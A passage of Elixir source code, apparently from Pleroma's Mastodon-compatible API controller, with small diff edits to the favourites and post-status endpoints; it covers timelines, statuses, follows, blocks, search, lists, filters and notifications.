	json(conn, res)
	end
	end

	defp add_if_present(
	map,
	params,
	params_field,
	map_field,
	value_function \\ fn x -> {:ok, x} end
	) do
	if Map.has_key?(params, params_field) do
	case value_function.(params[params_field]) do
	{:ok, new_value} -> Map.put(map, map_field, new_value)
	:error -> map
	end
	else
	map
	end
	end

	def update_credentials(%{assigns: %{user: user}} = conn, params) do
	original_user = user

	user_params =
	%{}
	\|> add_if_present(params, "display_name", :name)
	\|> add_if_present(params, "note", :bio, fn value -> {:ok, User.parse_bio(value)} end)
	\|> add_if_present(params, "avatar", :avatar, fn value ->
	with %Plug.Upload{} <- value,
	{:ok, object} <- ActivityPub.upload(value, type: :avatar) do
	{:ok, object.data}
	else
	_ -> :error
	end
	end)

	info_params =
	%{}
	\|> add_if_present(params, "locked", :locked, fn value -> {:ok, value == "true"} end)
	\|> add_if_present(params, "header", :banner, fn value ->
	with %Plug.Upload{} <- value,
	{:ok, object} <- ActivityPub.upload(value, type: :banner) do
	{:ok, object.data}
	else
	_ -> :error
	end
	end)

	info_cng = User.Info.mastodon_profile_update(user.info, info_params)

	with changeset <- User.update_changeset(user, user_params),
	changeset <- Ecto.Changeset.put_embed(changeset, :info, info_cng),
	{:ok, user} <- User.update_and_set_cache(changeset) do
	if original_user != user do
	CommonAPI.update(user)
	end

	json(conn, AccountView.render("account.json", %{user: user, for: user}))
	else
	_e ->
	conn
	\|> put_status(403)
	\|> json(%{error: "Invalid request"})
	end
	end

	def verify_credentials(%{assigns: %{user: user}} = conn, _) do
	account = AccountView.render("account.json", %{user: user, for: user})
	json(conn, account)
	end

	def user(%{assigns: %{user: for_user}} = conn, %{"id" => id}) do
	with %User{} = user <- Repo.get(User, id),
	true <- User.auth_active?(user) \|\| user.id == for_user.id \|\| User.superuser?(for_user) do
	account = AccountView.render("account.json", %{user: user, for: for_user})
	json(conn, account)
	else
	_e ->
	conn
	\|> put_status(404)
	\|> json(%{error: "Can't find user"})
	end
	end

	@mastodon_api_level "2.5.0"

	def masto_instance(conn, _params) do
	instance = Pleroma.Config.get(:instance)

	response = %{
	uri: Web.base_url(),
	title: Keyword.get(instance, :name),
	description: Keyword.get(instance, :description),
	version: "#{@mastodon_api_level} (compatible; #{Pleroma.Application.named_version()})",
	email: Keyword.get(instance, :email),
	urls: %{
	streaming_api: String.replace(Pleroma.Web.Endpoint.static_url(), "http", "ws")
	},
	stats: Stats.get_stats(),
	thumbnail: Web.base_url() <> "/instance/thumbnail.jpeg",
	max_toot_chars: Keyword.get(instance, :limit)
	}

	json(conn, response)
	end

	def peers(conn, _params) do
	json(conn, Stats.get_peers())
	end

	defp mastodonized_emoji do
	Pleroma.Emoji.get_all()
	\|> Enum.map(fn {shortcode, relative_url} ->
	url = to_string(URI.merge(Web.base_url(), relative_url))

	%{
	"shortcode" => shortcode,
	"static_url" => url,
	"visible_in_picker" => true,
	"url" => url
	}
	end)
	end

	def custom_emojis(conn, _params) do
	mastodon_emoji = mastodonized_emoji()
	json(conn, mastodon_emoji)
	end

	defp add_link_headers(conn, method, activities, param \\ nil, params \\ %{}) do
	last = List.last(activities)
	first = List.first(activities)

	if last do
	min = last.id
	max = first.id

	{next_url, prev_url} =
	if param do
	{
	mastodon_api_url(
	Pleroma.Web.Endpoint,
	method,
	param,
	Map.merge(params, %{max_id: min})
	),
	mastodon_api_url(
	Pleroma.Web.Endpoint,
	method,
	param,
	Map.merge(params, %{since_id: max})
	)
	}
	else
	{
	mastodon_api_url(
	Pleroma.Web.Endpoint,
	method,
	Map.merge(params, %{max_id: min})
	),
	mastodon_api_url(
	Pleroma.Web.Endpoint,
	method,
	Map.merge(params, %{since_id: max})
	)
	}
	end

	conn
	\|> put_resp_header("link", "<#{next_url}>; rel=\"next\", <#{prev_url}>; rel=\"prev\"")
	else
	conn
	end
	end

	def home_timeline(%{assigns: %{user: user}} = conn, params) do
	params =
	params
	\|> Map.put("type", ["Create", "Announce"])
	\|> Map.put("blocking_user", user)
	\|> Map.put("user", user)

	activities =
	ActivityPub.fetch_activities([user.ap_id \| user.following], params)
	\|> ActivityPub.contain_timeline(user)
	\|> Enum.reverse()

	conn
	\|> add_link_headers(:home_timeline, activities)
	\|> put_view(StatusView)
	\|> render("index.json", %{activities: activities, for: user, as: :activity})
	end

	def public_timeline(%{assigns: %{user: user}} = conn, params) do
	local_only = params["local"] in [true, "True", "true", "1"]

	params =
	params
	\|> Map.put("type", ["Create", "Announce"])
	\|> Map.put("local_only", local_only)
	\|> Map.put("blocking_user", user)

	activities =
	ActivityPub.fetch_public_activities(params)
	\|> Enum.reverse()

	conn
	\|> add_link_headers(:public_timeline, activities, false, %{"local" => local_only})
	\|> put_view(StatusView)
	\|> render("index.json", %{activities: activities, for: user, as: :activity})
	end

	def user_statuses(%{assigns: %{user: reading_user}} = conn, params) do
	with %User{} = user <- Repo.get(User, params["id"]) do
	activities = ActivityPub.fetch_user_activities(user, reading_user, params)

	conn
	\|> add_link_headers(:user_statuses, activities, params["id"])
	\|> put_view(StatusView)
	\|> render("index.json", %{
	activities: activities,
	for: reading_user,
	as: :activity
	})
	end
	end

	def dm_timeline(%{assigns: %{user: user}} = conn, params) do
	query =
	ActivityPub.fetch_activities_query(
	[user.ap_id],
	Map.merge(params, %{"type" => "Create", visibility: "direct"})
	)

	activities = Repo.all(query)

	conn
	\|> add_link_headers(:dm_timeline, activities)
	\|> put_view(StatusView)
	\|> render("index.json", %{activities: activities, for: user, as: :activity})
	end

	def get_status(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	with %Activity{} = activity <- Repo.get(Activity, id),
	true <- ActivityPub.visible_for_user?(activity, user) do
	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: activity, for: user})
	end
	end

	def get_context(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	with %Activity{} = activity <- Repo.get(Activity, id),
	activities <-
	ActivityPub.fetch_activities_for_context(activity.data["context"], %{
	"blocking_user" => user,
	"user" => user
	}),
	activities <-
	activities \|> Enum.filter(fn %{id: aid} -> to_string(aid) != to_string(id) end),
	activities <-
	activities \|> Enum.filter(fn %{data: %{"type" => type}} -> type == "Create" end),
	grouped_activities <- Enum.group_by(activities, fn %{id: id} -> id < activity.id end) do
	result = %{
	ancestors:
	StatusView.render(
	"index.json",
	for: user,
	activities: grouped_activities[true] \|\| [],
	as: :activity
	)
	\|> Enum.reverse(),
	descendants:
	StatusView.render(
	"index.json",
	for: user,
	activities: grouped_activities[false] \|\| [],
	as: :activity
	)
	\|> Enum.reverse()
	}

	json(conn, result)
	end
	end

	def post_status(conn, %{"status" => "", "media_ids" => media_ids} = params)
	when length(media_ids) > 0 do
	params =
	params
	\|> Map.put("status", ".")

	post_status(conn, params)
	end

	def post_status(%{assigns: %{user: user}} = conn, %{"status" => _} = params) do
	params =
	params
	\|> Map.put("in_reply_to_status_id", params["in_reply_to_id"])
	- \|> Map.put("no_attachment_links", true)

	idempotency_key =
	case get_req_header(conn, "idempotency-key") do
	[key] -> key
	_ -> Ecto.UUID.generate()
	end

	{:ok, activity} =
	Cachex.fetch!(:idempotency_cache, idempotency_key, fn _ -> CommonAPI.post(user, params) end)

	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: activity, for: user, as: :activity})
	end

	def delete_status(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	with {:ok, %Activity{}} <- CommonAPI.delete(id, user) do
	json(conn, %{})
	else
	_e ->
	conn
	\|> put_status(403)
	\|> json(%{error: "Can't delete this post"})
	end
	end

	def reblog_status(%{assigns: %{user: user}} = conn, %{"id" => ap_id_or_id}) do
	with {:ok, announce, _activity} <- CommonAPI.repeat(ap_id_or_id, user) do
	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: announce, for: user, as: :activity})
	end
	end

	def unreblog_status(%{assigns: %{user: user}} = conn, %{"id" => ap_id_or_id}) do
	with {:ok, _unannounce, %{data: %{"id" => id}}} <- CommonAPI.unrepeat(ap_id_or_id, user),
	%Activity{} = activity <- Activity.get_create_activity_by_object_ap_id(id) do
	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: activity, for: user, as: :activity})
	end
	end

	def fav_status(%{assigns: %{user: user}} = conn, %{"id" => ap_id_or_id}) do
	with {:ok, _fav, %{data: %{"id" => id}}} <- CommonAPI.favorite(ap_id_or_id, user),
	%Activity{} = activity <- Activity.get_create_activity_by_object_ap_id(id) do
	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: activity, for: user, as: :activity})
	end
	end

	def unfav_status(%{assigns: %{user: user}} = conn, %{"id" => ap_id_or_id}) do
	with {:ok, _, _, %{data: %{"id" => id}}} <- CommonAPI.unfavorite(ap_id_or_id, user),
	%Activity{} = activity <- Activity.get_create_activity_by_object_ap_id(id) do
	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: activity, for: user, as: :activity})
	end
	end

	def pin_status(%{assigns: %{user: user}} = conn, %{"id" => ap_id_or_id}) do
	with {:ok, activity} <- CommonAPI.pin(ap_id_or_id, user) do
	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: activity, for: user, as: :activity})
	else
	{:error, reason} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(:bad_request, Jason.encode!(%{"error" => reason}))
	end
	end

	def unpin_status(%{assigns: %{user: user}} = conn, %{"id" => ap_id_or_id}) do
	with {:ok, activity} <- CommonAPI.unpin(ap_id_or_id, user) do
	conn
	\|> put_view(StatusView)
	\|> try_render("status.json", %{activity: activity, for: user, as: :activity})
	end
	end

	def notifications(%{assigns: %{user: user}} = conn, params) do
	notifications = Notification.for_user(user, params)

	result =
	Enum.map(notifications, fn x ->
	render_notification(user, x)
	end)
	\|> Enum.filter(& &1)

	conn
	\|> add_link_headers(:notifications, notifications)
	\|> json(result)
	end

	def get_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
	with {:ok, notification} <- Notification.get(user, id) do
	json(conn, render_notification(user, notification))
	else
	{:error, reason} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => reason}))
	end
	end

	def clear_notifications(%{assigns: %{user: user}} = conn, _params) do
	Notification.clear(user)
	json(conn, %{})
	end

	def dismiss_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
	with {:ok, _notif} <- Notification.dismiss(user, id) do
	json(conn, %{})
	else
	{:error, reason} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => reason}))
	end
	end

	def relationships(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	id = List.wrap(id)
	q = from(u in User, where: u.id in ^id)
	targets = Repo.all(q)

	conn
	\|> put_view(AccountView)
	\|> render("relationships.json", %{user: user, targets: targets})
	end

	# Instead of returning a 400 when no "id" params is present, Mastodon returns an empty array.
	def relationships(%{assigns: %{user: _user}} = conn, _), do: json(conn, [])

	def update_media(%{assigns: %{user: user}} = conn, data) do
	with %Object{} = object <- Repo.get(Object, data["id"]),
	true <- Object.authorize_mutation(object, user),
	true <- is_binary(data["description"]),
	description <- data["description"] do
	new_data = %{object.data \| "name" => description}

	{:ok, _} =
	object
	\|> Object.change(%{data: new_data})
	\|> Repo.update()

	attachment_data = Map.put(new_data, "id", object.id)

	conn
	\|> put_view(StatusView)
	\|> render("attachment.json", %{attachment: attachment_data})
	end
	end

	def upload(%{assigns: %{user: user}} = conn, %{"file" => file} = data) do
	with {:ok, object} <-
	ActivityPub.upload(file,
	actor: User.ap_id(user),
	description: Map.get(data, "description")
	) do
	attachment_data = Map.put(object.data, "id", object.id)

	conn
	\|> put_view(StatusView)
	\|> render("attachment.json", %{attachment: attachment_data})
	end
	end

	def favourited_by(conn, %{"id" => id}) do
	with %Activity{data: %{"object" => %{"likes" => likes}}} <- Repo.get(Activity, id) do
	q = from(u in User, where: u.ap_id in ^likes)
	users = Repo.all(q)

	conn
	\|> put_view(AccountView)
	\|> render(AccountView, "accounts.json", %{users: users, as: :user})
	else
	_ -> json(conn, [])
	end
	end

	def reblogged_by(conn, %{"id" => id}) do
	with %Activity{data: %{"object" => %{"announcements" => announces}}} <- Repo.get(Activity, id) do
	q = from(u in User, where: u.ap_id in ^announces)
	users = Repo.all(q)

	conn
	\|> put_view(AccountView)
	\|> render("accounts.json", %{users: users, as: :user})
	else
	_ -> json(conn, [])
	end
	end

	def hashtag_timeline(%{assigns: %{user: user}} = conn, params) do
	local_only = params["local"] in [true, "True", "true", "1"]

	params =
	params
	\|> Map.put("type", "Create")
	\|> Map.put("local_only", local_only)
	\|> Map.put("blocking_user", user)
	\|> Map.put("tag", String.downcase(params["tag"]))

	activities =
	ActivityPub.fetch_public_activities(params)
	\|> Enum.reverse()

	conn
	\|> add_link_headers(:hashtag_timeline, activities, params["tag"], %{"local" => local_only})
	\|> put_view(StatusView)
	\|> render("index.json", %{activities: activities, for: user, as: :activity})
	end

	def followers(%{assigns: %{user: for_user}} = conn, %{"id" => id}) do
	with %User{} = user <- Repo.get(User, id),
	{:ok, followers} <- User.get_followers(user) do
	followers =
	cond do
	for_user && user.id == for_user.id -> followers
	user.info.hide_network -> []
	true -> followers
	end

	conn
	\|> put_view(AccountView)
	\|> render("accounts.json", %{users: followers, as: :user})
	end
	end

	def following(%{assigns: %{user: for_user}} = conn, %{"id" => id}) do
	with %User{} = user <- Repo.get(User, id),
	{:ok, followers} <- User.get_friends(user) do
	followers =
	cond do
	for_user && user.id == for_user.id -> followers
	user.info.hide_network -> []
	true -> followers
	end

	conn
	\|> put_view(AccountView)
	\|> render("accounts.json", %{users: followers, as: :user})
	end
	end

	def follow_requests(%{assigns: %{user: followed}} = conn, _params) do
	with {:ok, follow_requests} <- User.get_follow_requests(followed) do
	conn
	\|> put_view(AccountView)
	\|> render("accounts.json", %{users: follow_requests, as: :user})
	end
	end

	def authorize_follow_request(%{assigns: %{user: followed}} = conn, %{"id" => id}) do
	with %User{} = follower <- Repo.get(User, id),
	{:ok, follower} <- User.maybe_follow(follower, followed),
	%Activity{} = follow_activity <- Utils.fetch_latest_follow(follower, followed),
	{:ok, follow_activity} <- Utils.update_follow_state(follow_activity, "accept"),
	{:ok, _activity} <-
	ActivityPub.accept(%{
	to: [follower.ap_id],
	actor: followed.ap_id,
	object: follow_activity.data["id"],
	type: "Accept"
	}) do
	conn
	\|> put_view(AccountView)
	\|> render("relationship.json", %{user: followed, target: follower})
	else
	{:error, message} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => message}))
	end
	end

	def reject_follow_request(%{assigns: %{user: followed}} = conn, %{"id" => id}) do
	with %User{} = follower <- Repo.get(User, id),
	%Activity{} = follow_activity <- Utils.fetch_latest_follow(follower, followed),
	{:ok, follow_activity} <- Utils.update_follow_state(follow_activity, "reject"),
	{:ok, _activity} <-
	ActivityPub.reject(%{
	to: [follower.ap_id],
	actor: followed.ap_id,
	object: follow_activity.data["id"],
	type: "Reject"
	}) do
	conn
	\|> put_view(AccountView)
	\|> render("relationship.json", %{user: followed, target: follower})
	else
	{:error, message} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => message}))
	end
	end

	def follow(%{assigns: %{user: follower}} = conn, %{"id" => id}) do
	with %User{} = followed <- Repo.get(User, id),
	{:ok, follower} <- User.maybe_direct_follow(follower, followed),
	{:ok, _activity} <- ActivityPub.follow(follower, followed),
	{:ok, follower, followed} <-
	User.wait_and_refresh(
	Pleroma.Config.get([:activitypub, :follow_handshake_timeout]),
	follower,
	followed
	) do
	conn
	\|> put_view(AccountView)
	\|> render("relationship.json", %{user: follower, target: followed})
	else
	{:error, message} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => message}))
	end
	end

	def follow(%{assigns: %{user: follower}} = conn, %{"uri" => uri}) do
	with %User{} = followed <- Repo.get_by(User, nickname: uri),
	{:ok, follower} <- User.maybe_direct_follow(follower, followed),
	{:ok, _activity} <- ActivityPub.follow(follower, followed) do
	conn
	\|> put_view(AccountView)
	\|> render("account.json", %{user: followed, for: follower})
	else
	{:error, message} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => message}))
	end
	end

	def unfollow(%{assigns: %{user: follower}} = conn, %{"id" => id}) do
	with %User{} = followed <- Repo.get(User, id),
	{:ok, _activity} <- ActivityPub.unfollow(follower, followed),
	{:ok, follower, _} <- User.unfollow(follower, followed) do
	conn
	\|> put_view(AccountView)
	\|> render("relationship.json", %{user: follower, target: followed})
	end
	end

	def block(%{assigns: %{user: blocker}} = conn, %{"id" => id}) do
	with %User{} = blocked <- Repo.get(User, id),
	{:ok, blocker} <- User.block(blocker, blocked),
	{:ok, _activity} <- ActivityPub.block(blocker, blocked) do
	conn
	\|> put_view(AccountView)
	\|> render("relationship.json", %{user: blocker, target: blocked})
	else
	{:error, message} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => message}))
	end
	end

	def unblock(%{assigns: %{user: blocker}} = conn, %{"id" => id}) do
	with %User{} = blocked <- Repo.get(User, id),
	{:ok, blocker} <- User.unblock(blocker, blocked),
	{:ok, _activity} <- ActivityPub.unblock(blocker, blocked) do
	conn
	\|> put_view(AccountView)
	\|> render("relationship.json", %{user: blocker, target: blocked})
	else
	{:error, message} ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(403, Jason.encode!(%{"error" => message}))
	end
	end

	def blocks(%{assigns: %{user: user}} = conn, _) do
	with blocked_accounts <- User.blocked_users(user) do
	res = AccountView.render("accounts.json", users: blocked_accounts, for: user, as: :user)
	json(conn, res)
	end
	end

	def domain_blocks(%{assigns: %{user: %{info: info}}} = conn, _) do
	json(conn, info.domain_blocks \|\| [])
	end

	def block_domain(%{assigns: %{user: blocker}} = conn, %{"domain" => domain}) do
	User.block_domain(blocker, domain)
	json(conn, %{})
	end

	def unblock_domain(%{assigns: %{user: blocker}} = conn, %{"domain" => domain}) do
	User.unblock_domain(blocker, domain)
	json(conn, %{})
	end

	def status_search(user, query) do
	fetched =
	if Regex.match?(~r/https?:/, query) do
	with {:ok, object} <- ActivityPub.fetch_object_from_id(query),
	%Activity{} = activity <-
	Activity.get_create_activity_by_object_ap_id(object.data["id"]),
	true <- ActivityPub.visible_for_user?(activity, user) do
	[activity]
	else
	_e -> []
	end
	end \|\| []

	q =
	from(
	a in Activity,
	where: fragment("?->>'type' = 'Create'", a.data),
	where: "https://www.w3.org/ns/activitystreams#Public" in a.recipients,
	where:
	fragment(
	"to_tsvector('english', ?->'object'->>'content') @@ plainto_tsquery('english', ?)",
	a.data,
	^query
	),
	limit: 20,
	order_by: [desc: :id]
	)

	Repo.all(q) ++ fetched
	end

	def search2(%{assigns: %{user: user}} = conn, %{"q" => query} = params) do
	accounts = User.search(query, params["resolve"] == "true")

	statuses = status_search(user, query)

	tags_path = Web.base_url() <> "/tag/"

	tags =
	String.split(query)
	\|> Enum.uniq()
	\|> Enum.filter(fn tag -> String.starts_with?(tag, "#") end)
	\|> Enum.map(fn tag -> String.slice(tag, 1..-1) end)
	\|> Enum.map(fn tag -> %{name: tag, url: tags_path <> tag} end)

	res = %{
	"accounts" => AccountView.render("accounts.json", users: accounts, for: user, as: :user),
	"statuses" =>
	StatusView.render("index.json", activities: statuses, for: user, as: :activity),
	"hashtags" => tags
	}

	json(conn, res)
	end

	def search(%{assigns: %{user: user}} = conn, %{"q" => query} = params) do
	accounts = User.search(query, params["resolve"] == "true")

	statuses = status_search(user, query)

	tags =
	String.split(query)
	\|> Enum.uniq()
	\|> Enum.filter(fn tag -> String.starts_with?(tag, "#") end)
	\|> Enum.map(fn tag -> String.slice(tag, 1..-1) end)

	res = %{
	"accounts" => AccountView.render("accounts.json", users: accounts, for: user, as: :user),
	"statuses" =>
	StatusView.render("index.json", activities: statuses, for: user, as: :activity),
	"hashtags" => tags
	}

	json(conn, res)
	end

	def account_search(%{assigns: %{user: user}} = conn, %{"q" => query} = params) do
	accounts = User.search(query, params["resolve"] == "true")

	res = AccountView.render("accounts.json", users: accounts, for: user, as: :user)

	json(conn, res)
	end

	- def favourites(%{assigns: %{user: user}} = conn, _) do
	+ def favourites(%{assigns: %{user: user}} = conn, params) do
	params =
	- %{}
	+ params
	\|> Map.put("type", "Create")
	\|> Map.put("favorited_by", user.ap_id)
	\|> Map.put("blocking_user", user)

	activities =
	ActivityPub.fetch_public_activities(params)
	\|> Enum.reverse()

	conn
	+ \|> add_link_headers(:favourites, activities)
	\|> put_view(StatusView)
	\|> render("index.json", %{activities: activities, for: user, as: :activity})
	end

	def get_lists(%{assigns: %{user: user}} = conn, opts) do
	lists = Pleroma.List.for_user(user, opts)
	res = ListView.render("lists.json", lists: lists)
	json(conn, res)
	end

	def get_list(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	with %Pleroma.List{} = list <- Pleroma.List.get(id, user) do
	res = ListView.render("list.json", list: list)
	json(conn, res)
	else
	_e -> json(conn, "error")
	end
	end

	def account_lists(%{assigns: %{user: user}} = conn, %{"id" => account_id}) do
	lists = Pleroma.List.get_lists_account_belongs(user, account_id)
	res = ListView.render("lists.json", lists: lists)
	json(conn, res)
	end

	def delete_list(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	with %Pleroma.List{} = list <- Pleroma.List.get(id, user),
	{:ok, _list} <- Pleroma.List.delete(list) do
	json(conn, %{})
	else
	_e ->
	json(conn, "error")
	end
	end

	def create_list(%{assigns: %{user: user}} = conn, %{"title" => title}) do
	with {:ok, %Pleroma.List{} = list} <- Pleroma.List.create(title, user) do
	res = ListView.render("list.json", list: list)
	json(conn, res)
	end
	end

	def add_to_list(%{assigns: %{user: user}} = conn, %{"id" => id, "account_ids" => accounts}) do
	accounts
	\|> Enum.each(fn account_id ->
	with %Pleroma.List{} = list <- Pleroma.List.get(id, user),
	%User{} = followed <- Repo.get(User, account_id) do
	Pleroma.List.follow(list, followed)
	end
	end)

	json(conn, %{})
	end

	def remove_from_list(%{assigns: %{user: user}} = conn, %{"id" => id, "account_ids" => accounts}) do
	accounts
	\|> Enum.each(fn account_id ->
	with %Pleroma.List{} = list <- Pleroma.List.get(id, user),
	%User{} = followed <- Repo.get(Pleroma.User, account_id) do
	Pleroma.List.unfollow(list, followed)
	end
	end)

	json(conn, %{})
	end

	def list_accounts(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	with %Pleroma.List{} = list <- Pleroma.List.get(id, user),
	{:ok, users} = Pleroma.List.get_following(list) do
	conn
	\|> put_view(AccountView)
	\|> render("accounts.json", %{users: users, as: :user})
	end
	end

	def rename_list(%{assigns: %{user: user}} = conn, %{"id" => id, "title" => title}) do
	with %Pleroma.List{} = list <- Pleroma.List.get(id, user),
	{:ok, list} <- Pleroma.List.rename(list, title) do
	res = ListView.render("list.json", list: list)
	json(conn, res)
	else
	_e ->
	json(conn, "error")
	end
	end

	def list_timeline(%{assigns: %{user: user}} = conn, %{"list_id" => id} = params) do
	with %Pleroma.List{title: _title, following: following} <- Pleroma.List.get(id, user) do
	params =
	params
	\|> Map.put("type", "Create")
	\|> Map.put("blocking_user", user)

	# we must filter the following list for the user to avoid leaking statuses the user
	# does not actually have permission to see (for more info, peruse security issue #270).
	following_to =
	following
	\|> Enum.filter(fn x -> x in user.following end)

	activities =
	ActivityPub.fetch_activities_bounded(following_to, following, params)
	\|> Enum.reverse()

	conn
	\|> put_view(StatusView)
	\|> render("index.json", %{activities: activities, for: user, as: :activity})
	else
	_e ->
	conn
	\|> put_status(403)
	\|> json(%{error: "Error."})
	end
	end

	def index(%{assigns: %{user: user}} = conn, _params) do
	token =
	conn
	\|> get_session(:oauth_token)

	if user && token do
	mastodon_emoji = mastodonized_emoji()

	limit = Pleroma.Config.get([:instance, :limit])

	accounts =
	Map.put(%{}, user.id, AccountView.render("account.json", %{user: user, for: user}))

	initial_state =
	%{
	meta: %{
	streaming_api_base_url:
	String.replace(Pleroma.Web.Endpoint.static_url(), "http", "ws"),
	access_token: token,
	locale: "en",
	domain: Pleroma.Web.Endpoint.host(),
	admin: "1",
	me: "#{user.id}",
	unfollow_modal: false,
	boost_modal: false,
	delete_modal: true,
	auto_play_gif: false,
	display_sensitive_media: false,
	reduce_motion: false,
	max_toot_chars: limit
	},
	rights: %{
	delete_others_notice: !!user.info.is_moderator,
	admin: !!user.info.is_admin
	},
	compose: %{
	me: "#{user.id}",
	default_privacy: user.info.default_scope,
	default_sensitive: false
	},
	media_attachments: %{
	accept_content_types: [
	".jpg",
	".jpeg",
	".png",
	".gif",
	".webm",
	".mp4",
	".m4v",
	"image\/jpeg",
	"image\/png",
	"image\/gif",
	"video\/webm",
	"video\/mp4"
	]
	},
	settings:
	user.info.settings \|\|
	%{
	onboarded: true,
	home: %{
	shows: %{
	reblog: true,
	reply: true
	}
	},
	notifications: %{
	alerts: %{
	follow: true,
	favourite: true,
	reblog: true,
	mention: true
	},
	shows: %{
	follow: true,
	favourite: true,
	reblog: true,
	mention: true
	},
	sounds: %{
	follow: true,
	favourite: true,
	reblog: true,
	mention: true
	}
	}
	},
	push_subscription: nil,
	accounts: accounts,
	custom_emojis: mastodon_emoji,
	char_limit: limit
	}
	\|> Jason.encode!()

	conn
	\|> put_layout(false)
	\|> put_view(MastodonView)
	\|> render("index.html", %{initial_state: initial_state})
	else
	conn
	\|> redirect(to: "/web/login")
	end
	end

	def put_settings(%{assigns: %{user: user}} = conn, %{"data" => settings} = _params) do
	info_cng = User.Info.mastodon_settings_update(user.info, settings)

	with changeset <- Ecto.Changeset.change(user),
	changeset <- Ecto.Changeset.put_embed(changeset, :info, info_cng),
	{:ok, _user} <- User.update_and_set_cache(changeset) do
	json(conn, %{})
	else
	e ->
	conn
	\|> put_resp_content_type("application/json")
	\|> send_resp(500, Jason.encode!(%{"error" => inspect(e)}))
	end
	end

	def login(conn, %{"code" => code}) do
	with {:ok, app} <- get_or_make_app(),
	%Authorization{} = auth <- Repo.get_by(Authorization, token: code, app_id: app.id),
	{:ok, token} <- Token.exchange_token(app, auth) do
	conn
	\|> put_session(:oauth_token, token.token)
	\|> redirect(to: "/web/getting-started")
	end
	end

	def login(conn, _) do
	with {:ok, app} <- get_or_make_app() do
	path =
	o_auth_path(conn, :authorize,
	response_type: "code",
	client_id: app.client_id,
	redirect_uri: ".",
	scope: app.scopes
	)

	conn
	\|> redirect(to: path)
	end
	end

	defp get_or_make_app() do
	with %App{} = app <- Repo.get_by(App, client_name: "Mastodon-Local") do
	{:ok, app}
	else
	_e ->
	cs =
	App.register_changeset(%App{}, %{
	client_name: "Mastodon-Local",
	redirect_uris: ".",
	scopes: "read,write,follow"
	})

	Repo.insert(cs)
	end
	end

	def logout(conn, _) do
	conn
	\|> clear_session
	\|> redirect(to: "/")
	end

	def relationship_noop(%{assigns: %{user: user}} = conn, %{"id" => id}) do
	Logger.debug("Unimplemented, returning unmodified relationship")

	with %User{} = target <- Repo.get(User, id) do
	conn
	\|> put_view(AccountView)
	\|> render("relationship.json", %{user: user, target: target})
	end
	end

	def empty_array(conn, _) do
	Logger.debug("Unimplemented, returning an empty array")
	json(conn, [])
	end

	def empty_object(conn, _) do
	Logger.debug("Unimplemented, returning an empty object")
	json(conn, %{})
	end

	def render_notification(user, %{id: id, activity: activity, inserted_at: created_at} = _params) do
	actor = User.get_cached_by_ap_id(activity.data["actor"])
	parent_activity = Activity.get_create_activity_by_object_ap_id(activity.data["object"])
	mastodon_type = Activity.mastodon_notification_type(activity)

	response = %{
	id: to_string(id),
	type: mastodon_type,
	created_at: CommonAPI.Utils.to_masto_date(created_at),
	account: AccountView.render("account.json", %{user: actor, for: user})
	}

	case mastodon_type do
	"mention" ->
	response
	\|> Map.merge(%{
	status: StatusView.render("status.json", %{activity: activity, for: user})
	})

	"favourite" ->
	response
	\|> Map.merge(%{
	status: StatusView.render("status.json", %{activity: parent_activity, for: user})
	})

	"reblog" ->
	response
	\|> Map.merge(%{
	status: StatusView.render("status.json", %{activity: parent_activity, for: user})
	})

	"follow" ->
	response

	_ ->
	nil
	end
	end

	def get_filters(%{assigns: %{user: user}} = conn, _) do
	filters = Pleroma.Filter.get_filters(user)
	res = FilterView.render("filters.json", filters: filters)
	json(conn, res)
	end

	def create_filter(
	%{assigns: %{user: user}} = conn,
	%{"phrase" => phrase, "context" => context} = params
	) do
	query = %Pleroma.Filter{
	user_id: user.id,
	phrase: phrase,
	context: context,
	hide: Map.get(params, "irreversible", nil),
	whole_word: Map.get(params, "boolean", true)
	# expires_at
	}

	{:ok, response} = Pleroma.Filter.create(query)
	res = FilterView.render("filter.json", filter: response)
	json(conn, res)
	end

	def get_filter(%{assigns: %{user: user}} = conn, %{"id" => filter_id}) do
	filter = Pleroma.Filter.get(filter_id, user)
	res = FilterView.render("filter.json", filter: filter)
	json(conn, res)
	end

	def update_filter(
	%{assigns: %{user: user}} = conn,
	%{"phrase" => phrase, "context" => context, "id" => filter_id} = params
	) do
	query = %Pleroma.Filter{
	user_id: user.id,
	filter_id: filter_id,
	phrase: phrase,
	context: context,
	hide: Map.get(params, "irreversible", nil),
	whole_word: Map.get(params, "boolean", true)
	# expires_at
	}

	{:ok, response} = Pleroma.Filter.update(query)
	res = FilterView.render("filter.json", filter: response)
	json(conn, res)
	end

	def delete_filter(%{assigns: %{user: user}} = conn, %{"id" => filter_id}) do
	query = %Pleroma.Filter{
	user_id: user.id,
	filter_id: filter_id
	}

	{:ok, _} = Pleroma.Filter.delete(query)
	json(conn, %{})
	end

	def create_push_subscription(%{assigns: %{user: user, token: token}} = conn, params) do
	true = Pleroma.Web.Push.enabled()
	Pleroma.Web.Push.Subscription.delete_if_exists(user, token)
